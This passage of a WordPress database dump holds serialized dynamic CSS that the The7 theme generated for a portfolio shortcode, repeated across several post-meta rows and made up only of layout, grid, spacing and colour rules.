#page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(37423,5139,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-even .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-thumbnail-wrap {\n    -webkit-order: 0;\n    -moz-order: 0;\n    -ms-flex-order: 0;\n    order: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-title-content {\n    -webkit-order: 1;\n    -moz-order: 1;\n    -ms-flex-order: 1;\n    order: 1;\n    width: 100%;\n    padding: 20px 20px 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.centered-layout-list .post-entry-content {\n    -webkit-order: 2;\n    -moz-order: 2;\n    -ms-flex-order: 2;\n    order: 2;\n    padding-top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    padding: 20px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title {\n    margin: 3px 0 5px;\n    font-size: 20px;\n    line-height: 26px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n    margin: 5px 0 5px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n    margin: 15px 0 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details {\n    margin: 5px 0 10px;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-details.details-type-link {\n    margin-bottom: 2px;\n  }\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  grid-row-gap: 30px;\n  grid-column-gap: 30px;\n  grid-template-columns: repeat(auto-fill,minmax(,1fr));\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid {\n  display: flex;\n  flex-flow: row wrap;\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell,\n.no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.resize-by-browser-width) .dt-css-grid .wf-cell {\n  flex: 1 0 ;\n  max-width: 100%;\n  padding: 15px;\n  box-sizing: border-box;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  grid-template-columns: repeat(3,1fr);\n  grid-template-rows: auto;\n  grid-column-gap: 30px;\n  grid-row-gap: 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n  grid-column: span 2;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n  margin: -15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n  width: 33.333333333333%;\n  padding: 15px;\n}\n.cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n  width: calc(33.333333333333%) * 2;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width:not(.centered-layout-list):not(.content-bg-on) .dt-css-grid {\n  grid-row-gap: 0px;\n}\n@media screen and (max-width: 1199px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(3,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 33.333333333333%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(33.333333333333%)*2;\n  }\n}\n@media screen and (max-width: 991px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(2,1fr);\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 50%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(50%)*2;\n  }\n}\n@media screen and (max-width: 767px) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid {\n    grid-template-columns: repeat(1,1fr);\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .double-width {\n    grid-column: span 1;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell {\n    width: 100%;\n  }\n  .cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width,\n  .no-cssgridlegacy.no-cssgrid .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.resize-by-browser-width .dt-css-grid .wf-cell.double-width {\n    width: calc(100%)*2;\n  }\n}\n\";}'),
(37424,5122,'the7_shortcodes_dynamic_css','a:2:{i:0;s:0:\"\";s:32:\"d4f3d29c475ebf97cf26d99ef9e65ce5\";s:12869:\".portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.classic-layout-list article {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article {\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on.classic-layout-list article:first-of-type {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .post-entry-content {\n  width: calc(100% - );\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.classic-layout-list.mode-list .no-img .post-entry-content {\n  width: 100%;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .filter-bg-decoration .filter-categories a.act {\n  color: #fff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article {\n  margin-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article:first-of-type,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on:not(.mode-masonry) article.visible.first {\n  margin-top: 0;\n  padding-top: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.hover-scale article:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list article {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n  padding: 20px 20px 0px 20px;\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap *,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-rollover:after {\n  border-radius: 0px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.enable-bg-rollover .post-thumbnail-rollover:after {\n  background: -webkit-linear-gradient();\n  background: linear-gradient();\n}\n.bottom-overlap-layout-list.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container {\n  height: calc(100% - 100px);\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  width: 44px;\n  height: 44px;\n  line-height: 44px;\n  border-radius: 100px;\n  margin: 10px 5px 10px;\n}\n.content-rollover-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a,\n.gradient-overlay-layout-list:not(.content-align-center).portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a {\n  margin: 10px 10px 10px 0;\n}\n.dt-icon-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-hover-border-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  border-width: 0px;\n  border-style: solid;\n}\n.dt-icon-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:before {\n  background: rgba(255,255,255,0.3);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.dt-icon-hover-bg-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:after {\n  background: rgba(255,255,255,0.5);\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span:before {\n  font-size: 16px;\n  line-height: 44px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:not(:hover) > span {\n  color: #ffffff;\n}\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a > span,\n.dt-icon-hover-off.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.dt-icon-hover-on.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .project-links-container a:hover > span {\n  color: #ffffff;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-title,\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.owl-carousel .entry-title {\n  margin-bottom: 5px;\n  font-size: 22px;\n  line-height: 32px;\n  font-weight: bold;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-meta {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .portfolio-categories {\n  margin-bottom: 15px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .entry-excerpt {\n  margin-bottom: 5px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list) .post-entry-content {\n  padding: 20px 30px 30px 30px;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5:not(.centered-layout-list):not(.content-bg-on):not(.mode-list) .no-img .post-entry-content {\n  padding: 0;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on:not(.classic-layout-list):not(.centered-layout-list):not(.gradient-overlay-layout-list) .post-entry-content {\n  background: #f7f7f7;\n  -webkit-box-shadow: none;\n  box-shadow: none;\n}\n.portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.gradient-overlay-layout-list .post-entry-content {\n  border-radius: 0px;\n}\n@media screen and (max-width: ) {\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 article {\n    -webkit-flex-flow: column nowrap;\n    -moz-flex-flow: column nowrap;\n    -ms-flex-flow: column nowrap;\n    flex-flow: column nowrap;\n    margin-top: 20px;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.dividers-on article {\n    border: none;\n  }\n  .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5.content-bg-on.centered-layout-list article {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap,\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content {\n    width: 100%;\n    margin: 0;\n    top: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-thumbnail-wrap {\n    padding: 0;\n  }\n  #page .portfolio-shortcode.archive-d4f3d29c475ebf97cf26d99ef9e65ce5 .post-entry-content:after {\n    display: none;\n  }\n  